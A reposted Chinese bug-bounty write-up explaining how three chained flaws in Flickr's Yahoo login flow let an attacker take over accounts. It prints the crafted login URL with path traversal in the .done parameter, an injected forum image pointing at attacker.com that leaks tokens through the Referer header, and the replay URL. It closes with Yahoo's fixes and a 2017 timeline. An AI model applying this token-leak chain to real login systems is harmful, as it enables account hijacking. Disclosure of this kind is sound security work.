本文講的是價值7k美刀的Flickr網(wǎng)站漏洞是怎么樣的？，Flickr是雅虎旗下圖片分享網(wǎng)站，Reizelman發(fā)現(xiàn)該網(wǎng)站存在三個漏洞，三個漏洞相互配合使用,可以接管他人Flickr帳戶。

Flickr.com登錄流程概述 ? ?

Reizelman發(fā)現(xiàn)每次用戶登錄Flickr.com網(wǎng)站時，都會被重定向到login.yahoo.com域用于身份驗證。 ? ?

https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=H6T9XcS72e4mRnW3NpTAiU8ZkA–&.intl=il&.lang=en&mg=1&.done=https://login.yahoo.com/config/validate?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=JvVF95K62e6PzdPu7MBv2V8-&.intl=il&.done =https://www.flickr.com/signin/yahoo/?redir=https://www.flickr.com/null ?

以上網(wǎng)址是Yahoo帳戶登錄頁面，用戶被提示輸入他的賬戶密碼。輸入賬戶密碼并單擊登錄后，如果賬戶密碼有效，則將其重定向到以下Flickr url：

??https://www.flickr.com/signin/yahoo/?redir=https%3A%2F%2Fwww.flickr.com%2F&.data={first-token-value}&.ys={second-token-value }

Reizelman通過觀察，如果用戶已經(jīng)登錄到Y(jié)ahoo,再點擊登錄鏈接：

https://login.yahoo.com/config/login?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=H6T9XcS72e4mRnW3NpTAiU8ZkA–&.intl=il&.lang=en&mg=1&.done=https://login.yahoo.com/config/validate?.src=flickrsignin&.pc=8190&.scrumb=0&.pd=c=JvVF95K62e6PzdPu7MBv2V8-&.intl=il&.done =https://www.flickr.com/signin/yahoo/?redir=https://www.flickr.com/?

驗證的流程發(fā)生在后臺,用戶不需要在Yahoo域輸入他的賬戶密碼,即可完成flickr網(wǎng)站登錄認證。?

這種的驗證方式可能引發(fā)其他用戶的賬戶被黑客接管，因為用戶只需點擊單個鏈接（如在某些OAuth實現(xiàn)中）來進行身份驗證，這樣他就可以進行身份驗證。熟悉了登錄的流程，進行尋找是否有會被他人賬戶被黑客接管的風(fēng)險。?

通過以上的url我發(fā)現(xiàn),我可以控制.done這個參數(shù),該參數(shù)控制了登錄token的發(fā)送位置,看起來雅虎只驗證https://www.flickr.com/signin/yahoo/這種開頭的域，但是我們?nèi)匀豢梢愿郊?./所以如果我們將../../test附加到.done參數(shù) .ys及.data的Token將被發(fā)送到https://www.flickr.com/test頁面。?

這給了我一個引導(dǎo),假如我在ww.flickr.com找到一個重定向，我就可以把Token發(fā)送到我控制的服務(wù)器，但是無法在www.flickr.com主域找到一個重定向漏洞,所以我尋找其他的辦法。

經(jīng)過一番查找，我找到了這個頁面：https://www.flickr.com/html.gne?tighten=0&type=comment，可以在Flickr評論頁面中插入圖片。我覺得也許可以在評論插入一個外鏈圖片，Toeken將通過referer字段發(fā)送到我控制的機器上，我發(fā)表了一個評論插入了圖片。

??????/img?src=“https://attacker.com/someimage.jpg”/

該圖像確實插入在評論中了，但是src值成如下連接：

https://ec.yimg.com/ec?url=https://attacker.com/someimage.jpg&t=1491136241&sig=FGQiNHDOtEj7LQDBbYBnwA-~C

這實際是雅虎的代理,把用戶上傳圖片,自己保存,通過代理的方式來加載顯示,不去請求外部的服務(wù)器。但是,如果我使用一些技巧，我可以操縱Flickr圖像處理邏輯。發(fā)布了以下評論:

??/img?src=“//www.attacker.com/someimage.jpg”/

該注釋未被代理操作，并且src保持原樣,按理說圖片會顯示在評論中,但是,有遇到一個問題了，網(wǎng)站使用了Content-Security-Policy(CSP),img-src屬性定義了,只能從以下的網(wǎng)站加載圖片。因為我們插入圖片的網(wǎng)址不是白名單內(nèi)的,是無法加載的。

Content-Security-Policy:img-src?data:?blob:? https://*.flickr.com? https://*.flickr.net? http://*.flickr.net? https://*.staticflickr.com? http://*.staticflickr.com? https://*.yimg.com? https://*.yahoo.com? https://*.cedexis.com? https://*.cedexis-test.com? https://*.cedexis-radar.net? https://sb.scorecardresearch.com? https://image.maps.api.here.com? https://csync.yahooapis.com? https://*.paypal.com? https://*.pinterest.com? http://*.static-alpha.flickr.com? https://geo-um.btrll.com? https://connect.facebook.net? https://*.facebook.com? https://bs.serving-sys.com? https://*.adserver.yahoo.com? https://*.maps.api.here.com? https://*.maps.cit.api.here.com? https://*.ads.yahoo.com? https://secure.footprint.net

知道這一點后,我嘗試在其他頁面尋找可評論的地方，過了一段時間,找到了一個論壇頁面,www.flickr.com/help/forum/en-us/。這個頁面支持HTML代碼插入功能的評論，更爽的是https://www.flickr.com/help/forum/*這個網(wǎng)站都沒用使用CSP。

所以我在論壇發(fā)布了以下評論： ?/?img?src?=“?/??/?www.attacker.com/someimage.jpg”/

一個外部的圖片被插入到這里：

https://www.flickr.com/help/forum/en-us/72157668446997150/page14/

所以我現(xiàn)在要做的就是構(gòu)造最終的url，如下:

https://login.yahoo.com/config/validate?.src=flickrsignin&.pc=8190&.scrumb=cLI6NPLejY6&.scrumb2=GszxN7PzUWX&.pd=c%3DJvVF95K62e6PzdPu7MBv2V8-&.intl=il&.done=https://www.flickr.com/signin/yahoo/../?../help/forum/en-us/72157668446997150/page14/

當(dāng)用戶點擊鏈接時他被重定向到https://www.flickr.com/help/forum/en-us/72157668446997150/page14?data={some-token}&.ys={second -token}，在這個請求中,他向瀏覽器發(fā)出來了如下的請求。

GET?https://www.attacker.com/someimage.jpg?HTTP/1.1Host:?www.attacker.comConnection:?keep-aliveUser-Agent:?Mozilla/5.0?(Windows?NT?10.0;?Win64;?x64)?AppleWebKit/537.36?(KHTML,?like?Gecko)?Chrome/56.0.2924.87????Safari/537.36Accept:?image/webp,image/*,*/*;q=0.8Referer:?https://www.flickr.com/help/forum/en-us/72157668446997150/page14/?.data={some-token}&.ys={second-token}?Accept-Encoding:?gzip,?deflate,?sdch,?brAccept-Language:?he-IL,he;q=0.8,en-US;q=0.6,en;q=0.4,es;q=0.

可以看到Referer字段的含有.data={some-token}&.ys={second-token},將要發(fā)送到指定的網(wǎng)址,而這個網(wǎng)站是我們控制的,可以拿到Rerferer信息。

攻擊者通過referer拿到token之后,構(gòu)造攻擊url,如下

https://www.flickr.com/signin/yahoo/?.data={copied?from?refferer}＆。ys?=?{replied?referer

即可登錄到受害者的賬戶。

修復(fù)

雅虎通過以下的辦法來解決這個漏洞。

1. login.yahoo.com端點上的.done參數(shù)僅允許https://www.flickr.com/signin/yahoo/作為有效值。

2.使用“/ ?/ ”的插入的圖片也是固定的。

3.現(xiàn)在CSP應(yīng)用于Flickr論壇。

修復(fù)時間線

2017年4月2日 – ?通過Hackerone的初步報告

2017年4月3日 – ?報告舉報

2017年4月10日 – 報告已解決

2017年4月21日 – 7K $獎賞獎勵

原文發(fā)布時間為：2017年5月4日 本文作者：愣娃 本文來自云棲社區(qū)合作伙伴嘶吼，了解相關(guān)信息可以關(guān)注嘶吼網(wǎng)站。 原文鏈接

總結(jié)

以上是生活随笔為你收集整理的价值7k美刀的Flickr网站漏洞是怎么样的？的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。